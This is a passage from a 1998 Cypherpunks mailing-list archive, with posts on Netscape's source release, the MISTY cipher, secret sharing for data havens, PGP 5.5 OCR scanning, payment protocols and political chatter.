they'll let me go in and play around for free. They have some quite
professional equipment, Raptors and several non-linear editing decks as
well as a bunch of Amiga Video Toasters and such. That experience is one of
the reasons I ended getting my own Toaster. The hard drive of which failed
and I have spend the last few evenings, between answering your traffic,
rebuilding. It finaly came back online yesterday and I think I've just about
got it all rebuilt software wise.

One of the local Austin Cypherpunks works on a variety of shows down there
and occassionaly puts on his own video game review production. We had hoped
to do a 30 minute 'state of crypto today' show but we never could get the
momentum going.

                                                    Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 24 Jan 1998 02:18:57 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Test [No reply please]
Message-ID: <199801231815.MAA15013@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Test

No reply please


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jim.burnes@ssds.com>
Date: Sat, 24 Jan 1998 03:27:55 +0800
To: cypherpunks@toad.com
Subject: PGP SDK integrated into Communicator 5.x Mail?
Message-ID: <34C8ED9B.283E7D4@ssds.com>
MIME-Version: 1.0
Content-Type: text/plain



OK:

I'm sure I'm not the first one to think of this one.

With Communicator 5.x source code being free, how long
will it take for someone to integrate it with PGP SDK
(and mixmaster and nym.alias.net nyms for that matter?)

Whew!

jim

-- 

      "How do you explain school to higher intelligence?"
               Elliot to his brother in ET





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 24 Jan 1998 02:52:01 +0800
To: cypherpunks@toad.com
Subject: Re: Misty???
Message-ID: <1.5.4.32.19980123183020.00727acc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



One version of MISTY appeared a couple of years ago, and it was 
discussed on cpunks then. Mitsubishi has had brief descriptions
of it since then as the algorithm used on its LSI chip. Here are
two almost identical Melco blurbs which describe the features of
MISTY1 and MYSTY2:

   http://www.melco.co.jp/rd_home/map/j_s/topics/new/misty_e.html

   http://www.mitsubishi.com/ghp_japan/TechShowcase/Text/tsText06.html

Note that these undated sites promise to publicize the algorithm 
and state that public testing of algorithms is a means of
assuring their strength.

Matsui, one of its authors, is a highly respected cryptographer and 
he's a regular participant in international crypto conferences.
His articles on the ciphers underlying MISTY are listed in the 
IETF draft for it:

   http://jya.com/misty1.htm

For those who wish to see the 25 draft encryption algorithms 
submitted to IETF in 1997 (MISTY1 the last) see a list at:

   http://jya.com/ietf-dea-97.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John M" <estoy@hotmail.com>
Date: Sat, 24 Jan 1998 06:20:15 +0800
To: cypherpunks@toad.com
Subject: Re: How to eliminate liability?
Message-ID: <19980123220714.7351.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill,

Thanks for your response.  Such a simple idea, I kinda figgered (was 
hoping) that it was already thought of, but I hadn't heard of it.  I 
have been meaning to buy Schneier's book...

One of my points, however, is that if the division of the encrypted 
information is done properly, even if the private key were deduced by 
whatever means, all they would find is (for instance) the high order 
bits and some ECC, but nothing that could be used to regenerate any 
meaningful information without the other parts.  Because of this, I have 
been asking myself, how could any one datahaven operator be held 
responsible for holding classified, porn, or other information if they 
only have a meaningless slice of it?

Perhaps this is more a legal question (even more out of my league) than 
anything...  Any comments?


>Secret Sharing is easy, and there are a number of implementations with
>useful properties like being able to read the original from K of N 
parts.*
>The problem is how to implement it in ways that protect the server
>operators as well as the information providers.  For instance,
>the author's client software can do the split and send the shares too
>different servers, and make sure the readers know how to find the 
pieces;
>this can even be automated enough to make it convenient.
>This not only makes it hard for the Bad Guys to find the pieces,
>it makes it impossible for the data haven provider to know what's
>being stored there, and even if the site is siezed it doesn't give up
>the critical information.  This is a Good Thing, and we've discussed 
it.
>
>On the other hand, what happens if a Bad Guy wants to entrap the 
operator,
>by planting child pornography, pirated software, and TOP SECRET data
>in the data haven, advertising on Usenet and then calling the cops.  
>Anybody, including the cops, can retrieve the contraband and bust them.
>So what are the alternatives, besides obviously encrypting your disks
>so it's harder to determine what's on them besides the plant,
>and the ever popular "don't let them find your physical location"?
>Perhaps the data haven can do the split and farm the data out to
>other data havens - but how do they know the data they're receiving
>is really a slice of contraband data instead of Yet Another Plant?
>It gets pretty convoluted.
>
>[* You can read about secret sharing in Schneier. ]
>				Thanks! 
>					Bill
>Bill Stewart, bill.stewart@pobox.com
>PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639
>


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 24 Jan 1998 04:33:51 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Poll shows Bill G. popular & MS monopoly supported [CNN]
Message-ID: <199801232028.OAA15813@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                    POLL SHOWS BILL GATES' POPULARITY GROWING
>                                        
>      Gates poll graphic January 23, 1998
>      Web posted at: 1:58 p.m. EST (1858 GMT)
>      
>      (CNN) -- The popularity of Microsoft Corp. Chairman Bill Gates among
>      Americans is growing, according to a CNN/Time magazine poll, and
>      almost half of the computer users interviewed favor having the
>      company become the dominant provider of Internet services.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 24 Jan 1998 03:49:40 +0800
To: Markus.Kuhn@cl.cam.ac.uk
Subject: Re: Netscape 5 will be GPL'ed
In-Reply-To: <E0xvVff-0003c1-00@heaton.cl.cam.ac.uk>
Message-ID: <199801231938.OAA19072@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Markus Kuhn wrote:

| > NETSCAPE ANNOUNCES PLANS TO MAKE NEXT-GENERATION COMMUNICATOR SOURCE CODE
| > AVAILABLE FREE ON THE NET
| 
| Excellent!
| 
| Finally mainstream software companies start to understand that security
| critical software has to be provided to the customer in full compilable
| source code to allow independent security evaluation.

	I'm not sure that this is the message they're sending at all.
They're trying to work the Linux/GNU model of getting a horde of
volunteer programmers to improve their product, and base other
products on it, because of the ease of integration.  I don't know that
security was even on their minds.

| No formal CC/ITSEC evaluation process can beat the scrutiny of the
| Internet crowd.  I wonder how long we have to wait for the day on which

Not that the internet crowd is such hot shit, either.  The freely
usable FWTK contained a *really* easy to find replay attack for about
3 years, befire I pointed it out at the Crypto rump session.
(www.homeport.org/~adam/crypto97.html).  Small code.  Comments
pointing to problems.  Security critical in some instances.  3 Years
to find.

Adam



| we can download the latest GPL'ed Windows NT version source code from
| Microsoft's web server ...



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Fri, 23 Jan 1998 12:11:14 +0800
To: "'cypherpunks@toad.com>
Subject: FW: Symantec Norton, Your Eyes Only.
Message-ID: <01ISPY42BHTU00B7O0@hmgwy1.isd.tafensw.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Anyone?

> -----Original Message-----
> From:	Pearson Shane 
> Sent:	Thursday, January 15, 1998 1:25 PM
> To:	'cypherpunks@toad.com'
> Subject:	Symantec Norton, Your Eyes Only.
> 
> 
> Hey all,
> 
> Just wondering what people think of this product?
> Good, bad or ugly?
> 
> Is there an international version and a US version?
> 
> If so, what limitations are in the international version?
> 
> Many thanks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 24 Jan 1998 05:10:31 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Poll shows Bill G. popular & MS monopoly supported [CNN]
In-Reply-To: <199801232028.OAA15813@einstein.ssz.com>
Message-ID: <199801232117.QAA15910@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199801232028.OAA15813@einstein.ssz.com>, on 01/23/98 
   at 02:28 PM, Jim Choate <ravage@ssz.com> said:


>Forwarded message:

>>                    POLL SHOWS BILL GATES' POPULARITY GROWING
>>                                        
>>      Gates poll graphic January 23, 1998
>>      Web posted at: 1:58 p.m. EST (1858 GMT)
>>      
>>      (CNN) -- The popularity of Microsoft Corp. Chairman Bill Gates among
>>      Americans is growing, according to a CNN/Time magazine poll, and
>>      almost half of the computer users interviewed favor having the
>>      company become the dominant provider of Internet services.

<sigh> And the sheeple bindly march on. :(

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: This marks Logical End-Of-Message. Physical EOM follows

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMj24o9Co1n+aLhhAQEXVwP8CnRvxvwou3wmDxEXTvbdm6dPO56dW5sy
ZdT4WIRaBnW7pZ7ZsXBMrer4xotUhVCURiYatcbzVb1O+T+UwmP7Lm6AGL1btuSS
AYfB/odSX3gD3YQcvK9GAsYFrkq09I5j4x5UUVZAMB6SpkaJFc4AHrZX2+8UBXP9
iXuWtpwRkM8=
=lJis
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John W. Adams"<jwadams@golive.com>
Date: Sat, 24 Jan 1998 07:44:13 +0800
To: <cypherpunks@cyberpass.net>
Subject: GoLive CyberStudio2
Message-ID: <199801232335.PAA23942@rigel.cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain




Hello Mac User,
	Our records indicate that you 
downloaded a 
free 30-day trial of GoLive CyberStudio 2 from 
our web 
site. Your 30-day trial evaluation period has 
expired. 
Purchasing the full copy of the software now will 
allow you 
to continue working without losing any of your 
pages or 
sites.  I can also include the new "CyberStudio 2" 
book 
by Peach Pit Press (an $18.95 value) for free.  I'll 
need for 
you to contact me within 30 days so that I may 
facilitate 
your purchase.
	Since your download, we are proud to 
announce that GLCS2 won the prestigious Eddy 
Award 
for Best Web Development Software at 
MacWorld this 
month, so you can rest assured that you are 
getting the 
best possible solution for your web development 
and 
management.
	I look forward to hearing from you.  
Thanks.
John W. Adams, Direct Sales
GoLive Systems, Inc.
800-554-6638, opt 1
or 512-464-8545 direct
mailto:jwadams@golive.com
http://www.golive.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 24 Jan 1998 07:44:47 +0800
To: cypherpunks@cyberpass.net
Subject: Internal Affairs: Looking for Lewinsky, from Netly News (fwd)
Message-ID: <Pine.GSO.3.95.980123154108.1703F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Fri, 23 Jan 1998 15:41:04 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Internal Affairs: Looking for Lewinsky, from Netly News

	
*******

http://cgi.pathfinder.com/netly/opinion/0,1042,1708,00.html

The Netly News (http://netlynews.com/)
January 23, 1998

Internal Affairs: Looking for Lewinsky
by Declan McCullagh (declan@well.com)
 
        Call it the year the Internet brought down a president. If
   President Clinton just can't shake this week's accusation of
   peripatetic philandering, let's give the Net some credit.

        First, we must acknowledge Matt Drudge, the online rumormonger
   who finally exacted his revenge on Clinton for supporting Blumenthal
   v. Drudge, a lawsuit with a million-dollar price tag. When Newsweek
   spiked an expos  of the Monica Lewinsky scandal, it was Drudge who
   spread the rumor across the Net and throughout the media on Saturday,
   January 17.

   [...]
   
        Of course, until yesterday, Clinton's impeachment seemed about as
   far-fetched a possibility as our unearthing one of Lewinsky's close
   friends on Usenet -- which is exactly what The Netly News was
   dispatched to do. Every time there's a major news event, our intrepid
   Internet team is called forth to scour DejaNews, troll IRC and
   mass-mail anyone who might possibly divulge information on the given
   subject.

       The Lewinsky search was less revealing than most. We found the
   former White House intern's annual salary; her home address in
   Portland, Ore.; the amount she and her mother donated to Democratic
   campaigns ($1,550 in 1996). Someone informed us, in all seriousness,
   that Lewinsky once gave him a goldfish. We also had people ask us if
   we'd pay them for information. (Fat chance.)

   [...]
   
   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Fri, 23 Jan 1998 12:58:32 +0800
To: "'William H. Geiger III'" <whgiii@invweb.net>
Subject: RE: FW: Symantec Norton, Your Eyes Only.
Message-ID: <01ISPZTCTU9U00AS02@hmgwy1.isd.tafensw.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Hi William,

Many thanks for the reply.

I was hoping it was ok having Blowfish,
but I guess it could be their own
"efficient" version.

Bye for now.

> -----Original Message-----
> From:	William H. Geiger III [SMTP:whgiii@invweb.net]
> Sent:	Friday, January 23, 1998 2:12 PM
> To:	Pearson Shane
> Cc:	'cypherpunks@toad.com'
> Subject:	Re: FW: Symantec Norton, Your Eyes Only.
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In <01ISPY42BHTU00B7O0@hmgwy1.isd.tafensw.edu.au>, on 01/23/98 
>    at 02:56 PM, Pearson Shane <Shane.Pearson@tafensw.edu.au> said:
> 
> >Anyone?
> 
> >> -----Original Message-----
> >> From:	Pearson Shane 
> >> Sent:	Thursday, January 15, 1998 1:25 PM
> >> To:	'cypherpunks@toad.com'
> >> Subject:	Symantec Norton, Your Eyes Only.
> >> 
> >> 
> >> Hey all,
> >> 
> >> Just wondering what people think of this product?
> >> Good, bad or ugly?
> >> 
> >> Is there an international version and a US version?
> >> 
> >> If so, what limitations are in the international version?
> >> 
> >> Many thanks...
> 
> 
> Is source code available for peer review? NO
> 
> Is it US Commercial software? YES
> 
> I wouldn't use it to secure an outhouse. No source no trust.
> 
> - -- 
> - ---------------------------------------------------------------
> William H. Geiger III  http://users.invweb.net/~whgiii
> Geiger Consulting    Cooking With Warp 4.0
> 
> Author of E-Secure - PGP Front End for MR/2 Ice
> PGP & MR/2 the only way for secure e-mail.
> OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html
> 
> - ---------------------------------------------------------------
>  
> Tag-O-Matic: If at first you don't succeed, work for Microsoft.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3a-sha1
> Charset: cp850
> Comment: Registered_User_E-Secure_v1.1b1_ES000000
> 
> iQCVAwUBNMgK6Y9Co1n+aLhhAQF08wP/abLg8ftPY7nuJ1hp8OKi6Ik2lx7A70/3
> 0GU++TZAmLWJ4XKlgCiujm0Z06P3rSEf+qtiIOTfFKUaN4kvt9JlmkH6h8fmuAJf
> t48Cq5XQbeYDMJ6HjvGpPraZJd5zmqv54UQuUjswZBONNIMqt+ypy6id/hpe0BY9
> mOg9VyMW1cM=
> =aNiz
> -----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 24 Jan 1998 06:41:03 +0800
To: cypherpunks@toad.com
Subject: Re: Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <3.0.5.32.19980122094933.00844100@popd.ix.netcom.com>
Message-ID: <1y5RJe1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



bill.stewart@pobox.com writes:

> >Jack Aaron's, the commodities division of Goldman Sachs, controls inter alia
> >like 99% of US coffee supply.  if you try to circumvent their monopoly,
> >by trying to import a material amount of coffee, whether it's the cheap shit
> >for proles or the high-end caffeine fix from Kenya, you and your suppliers
> >just might find yourself in a lot more trouble that the computer manusfactur
> >who were reluctant to put the free mickeysoft browser on their dekstop.
> >Why doesn't DOJ come down on Goldman Sachs?  Does it have anything to do wit
> >the fact that a Goldman Sachs partner is in Clinton's cabinet?
> 
> Yow - talk about threats to the Computer Industry - Controlling our
> Coffee Supply can affect the productivity of the Entire Country!
> These Monopolists are  after our precious bodily fluids!

Purity Of Essence[tm]

> 
> BTW, if you've ever been to Sacramento, CA, that hive of villiany
> and stupidity, there's apparently a law or custom which says that
> nobody may make or sell any coffee strong enough to wake up a
> government bureaucrat...


The heathen custom of percolating coffee leads to mental degeneracy
and sexual perversion.  When the water passing through the grinds is
not boiling, many essential chemicals remain in the grinds.  The
only civilized way to make coffee is to boil the grinds in the water
for a few minutes.  Try it, you'll discover that it tastes completely
differently from the percolated swill.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 24 Jan 1998 07:14:50 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Physical Meet: Saturday Feb. 14? (fwd)
Message-ID: <199801232308.RAA16685@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> > I would like to set the Feb. physical meeting for Saturday the 14th at the
> > normal 6-7pm time.
> > 
> > An alternate would be the following 21'st.
> > 
> > Any major objections to the 14th? Suggestions on location?
> 
> Let's shoot for the 21st.  My wife will kill me if I try to leave
> the house on the 14th.   :-)

Any other suggestions? I personaly don't care so unless somebody else speaks
up before Sunday I'll go ahead and set it for the 21st and begin to make the
announcements on the cypherpunks mailing list.

Who wants to make the usenet round?


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Jan 1998 06:32:16 +0800
To: cypherpunks@cyberpass.net
Subject: Group works on way to make Net payments work.
Message-ID: <v04003903b0eec7dbc279@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Fri, 23 Jan 1998 13:28:39 -0800 (PST)
From: William Knowles <erehwon@dis.org>
To: DCSB <dcsb@ai.mit.edu>
Subject: Group works on way to make Net payments work.
Organization: Home for retired social engineers & unrepented cryptophreaks
MIME-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: William Knowles <erehwon@dis.org>

SAN FRANCISCO (Wired) - Someone out there is actually worried that you
might end up with a desktop littered with different digital wallets or
that you might not get a receipt for your pay-per-view time visiting
an X-rated site.

In fact, a group of 30 electronic payment companies are working on a
protocol that would ensure that all digital wallets and cybercash
registers will know how to talk to each other and issue the proper
digital "paper trails."

Spearheaded by ecash pioneer, Mondex International, the group is
working on an way to make a single digital wallet on the desktop to
interact with the payment systems designed by everyone from CyberCash
to AT&T to Wells Fargo Bank.

By using XML (extended markup language), the protocol is designed to
ensure interoperability among the software used by buyers, sellers,
and financial institutions to carry out online transactions.

The open trading protocol hasn't gotten half the attention that SET,
the secure electronic transaction protocol, has. And, at first glance,
its job may not seem as crucial since it's not about guaranteeing the
security of transactions.

But those aboard the new protocol-defining body say their system of
compatible operations is key to getting consumers to really embrace
e-commerce.

"Imagine if you've got an IBM wallet, a Microsoft wallet, and a
VeriFone wallet," suggested Mondex International development
co-director, David Burdett.

"Unless you have some standard way in which these wallets can
communicate with each other and with merchants, you aren't going to
end up with interoperability and the consumer's going to have to have
lots of different wallets on the PC."

The goal of the open trading protocol is to make transparent the
traditional steps in a transaction: the offer for sale, agreement to
purchase, generation of receipt, and attendant paper trail. And to
make it all happen with no more than a click of the buyer's mouse.

"(The open trading protocol) is trying to replicate in the virtual
world what people have in the real world: things like invoices, making
payments, getting receipts and delivery of goods," said Burdett. And
to guarantee that you can have real-world accountability, even for
virtual purchases.

"If you're only getting delivery of virtual goods over the Net, such
as software or entertainment content that you pay for, there's no
physical delivery at all; but you still want a receipt and all the
other normal aspects of a transaction," Burdett said.

A preliminary version of the proposed common language was posted
early this month to the OTP Web site, by the 30-member consortium,
which includes CyberCash, DigiCash, IBM, MasterCard, Mondex, Netscape,
Oracle, Sun Microsystems, VeriFone, and Wells Fargo Bank.

Conspicuously absent from the coalition are Visa International,
which reportedly declined to join the coalition when invited by
Mondex, and Microsoft, which apparently opted out of the group's
plan because it is busy developing an alternate standard called
the Value Chain Initiative.

Still, Microsoft's absence isn't expected to thwart widespread
adoption of the protocol.

"There's a lot of flexibility with these protocols," said Zona
Research analyst Vernon Keenan, who pointed out that the group
protocol and Microsoft's version are not necessarily mutually
exclusive. "The key factor to determine adoption is whether ...
the major commerce server players incorporate these protocols."
And it seems at least several will, since they've already joined
the ranks of open trading protocol proponents.


--
The information standard is more draconian than the gold
standard, because the government has lost control of the
marketplace.  --  Walter Wriston
--
http://www.dis.org/erehwon/


For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <remailer@sabotage.net>
Date: Sat, 24 Jan 1998 00:43:35 +0800
To: cypherpunks@Algebra.COM
Subject: Surprisingly fast PGP5.5(i) scanning and proofreading
Message-ID: <199801231635.RAA13976@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



From: ica@hawking.fokus.gmd.de (Ingmar Camphausen)
Newsgroups: de.comp.security,alt.security.pgp,comp.security.pgp.discuss
Subject: Surprisingly fast PGP5.5(i) scanning and proofreading
Message-ID: <6aaf44$id8@stern.fokus.gmd.de>

I am probably not the only one surprised how "out of a sudden" 
the 5.5 version of PGP was scanned and proofread by Stale Schumacher
alone (as it seemed to me). 

Hence I asked him and Teun Nijssen (they, according to the README in
the PGPsdk 5.5 distribution on www.pgpi.com, did all the work) how
come they were so much faster and there wasn't a coordinated 
"distributed" proofreading as with the "international" version of PGP5.0.

Teun took the time for a detailed answer and was so kind to permit its
free distribution; so here is what he wrote in reply to my request:

---8<--snip--------------------------------------------------------

Hello Ingmar,

there are no secrets in this reply; you may do with it whatever you like.

/I was somewhat surprised how suddenly and fast PGP5.5(i) was scanned *and*
/proofread.

Thank you.

/Having participated in the proofreading of the 5.0i version and with the
/amount of time spent by the "correctors" all over the world in mind, I had
/the impression that 5.5 was there and proofread like "a bolt out of the
/blue"!

It took roughly 100 hours of stamina, between Christmas and 5 January to scan
the complete 5.5 books and to correct the 5000 pages of the PGPsdk and Win
version.

Scanning was no longer an issue, as we had now an Automatic Document Feeder
for the HP Scanjet 4C at our disposal. This ADF has been the hero of the two
weeks: actually it did not scan 7500 pages ("tools" book + 5.5) but about
10.000 pages, since an initial set of about 3000 pages was discarded when
the OCR quality proved not optimal yet. This wonderful ADF misfed exactly zero
pages on all this effort. It can contain 50 pages input, so 10.000 pages
require 200 manual interventions 30 minutes separated from each other (the HP
Scanjet 4C combined with Omnipage Pro takes a little bit less than 30 seconds
per page). One Pentium did nothing but scanning, several days starting at 9:00
and finishing around 23:00.

The reason that correction went so much better than on either of the two
editions of PGP 5.0 was in the new format of the books. The fonts are now
excellent, including visible 'tab' characters (kind of triangles), visible
spaces (if more than one space is used somewhere, the second one is printed as
a tiny black triangle) and a special 'underscore' with little curls. This new
book format is supported by a truely marvelous new 'repair' utility, that
obviously was optimized to correct the results that come from using an
Omnipage version HP Scanjet 4c: the intro of the book "Tools for Publishing
Source Code via OCR" describe setting-up the OCR on a Mac/Omnipage/HP 4c.

Anyway, repairing 100 pages now takes 4 hours worst case (if very many visible
spaces are used: Omnipage often mis-counts multiple visible spaces). And best
case: 100 pages can be repaired in half an hour. That is twice the speed of
scanning.

The true horror of PGP 5.0 was the BINARIES.ZIP file. It was done within
8 hours for 5.5 Windows. The trick was simply to manually delete any page that
contained any error. Then run the 'sortpage' utility to report what was
missing and *re-scan* those pages. In this way it went from 217 pages to 30
and then to only 6 pages that needed real correction, because at the margin of
these pages some lines had not got enough black ink from the book print
process.

/Did you get any special ...emmmm...support?

very definitely not! Neither would we have accepted it should it have been
available. It was not available. We think this game should be played "by the
book" (sic).

The books were simply an order of magnitude better.
I think that someone at PGP Inc really tested scanning this time, before
printing. Now if they print a next bookset, let's hope they pretty-print
everything, discarding trailing visible whitespace and replacing initial
spaces by tabs on all lines...

/Or did I just miss a "call for volunteers" etc. like the one that
/preceeded the release of PGP5.0i?

Nope, there was no call this time, because Stale and me could do it alone.

/I am very interested in a satisfying answer to this question, for it is
/closely related to the credibility of the international PGP website and
/the new software version.

I agree with that objective. That is the reason that I wrote this answer as
extensively as I did and why I permit you to publish it as widely as you like.

cheers,

teun

Senior Project Manager
Computer Centre
Tilburg University

------------------------------------------>8----snip-------------

The original reply was PGP-signed by Teun; it should be available via 
http://www.in-berlin.de/User/aurora/teun_pgp55-ocr.txt from 
today, ~ 7pm UTC (GMT) on.

	Ingmar 

-- 
Ingmar Camphausen   camphausen@fokus.gmd.de   PGP key on server 
GMD FOKUS  =  Research Institute for Open Communication Systems 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Sat, 24 Jan 1998 09:48:08 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@ssz.com>
Subject: Re: Poll shows Bill G. popular & MS monopoly supported [CNN]
In-Reply-To: <199801232028.OAA15813@einstein.ssz.com>
Message-ID: <19980123174224.64030@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, Jan 23, 1998 at 02:59:53PM -0500, William H. Geiger III wrote:
> >Forwarded message:
> 
> >>                    POLL SHOWS BILL GATES' POPULARITY GROWING
> >>                                        
> >>      Gates poll graphic January 23, 1998
> >>      Web posted at: 1:58 p.m. EST (1858 GMT)
> >>      
> >>      (CNN) -- The popularity of Microsoft Corp. Chairman Bill Gates among
> >>      Americans is growing, according to a CNN/Time magazine poll, and
> >>      almost half of the computer users interviewed favor having the
> >>      company become the dominant provider of Internet services.
> 
> <sigh> And the sheeple bindly march on. :(

Bill -- you *believed* this?  :-)

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 24 Jan 1998 10:34:36 +0800
To: Jonathan Wienke <cypherpunks@cyberpass.net
Subject: Re: Sucking Sound...
In-Reply-To: <3.0.3.32.19980123083544.006a9088@popd.netcruiser>
Message-ID: <v03102800b0ef0154981a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:35 AM -0800 1/23/98, Jonathan Wienke wrote:

>Has anyone else heard a "giant sucking sound" from the vicinity of the
>White House lately?

If that was an intentional pun, a good one.

But I had been marveling at how the Clinton troubles were being ignored by
the Cypherpunks...I figured we were all so jaded about government and the
criminals who flourish in Washington that there was no point in commenting
on this latest revelation of corruption. (The apparent perjury, suborning
perjury, and witness-tampering, not the affair with Lewinsky, however
tawdry it was.)

It would have been interesting to see the whole process leading up to
Clinton's resignation (next week?) pass without any discussion by us.

(Actually, I threw in an aside yesterday about "President Gore," but no one
picked up on it.)

Personally, I think having a crippled and ineffective President is better
than having an activist bozo President Gore, so I'm kind of hoping this
whole affairs takes several more months to unwind.

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
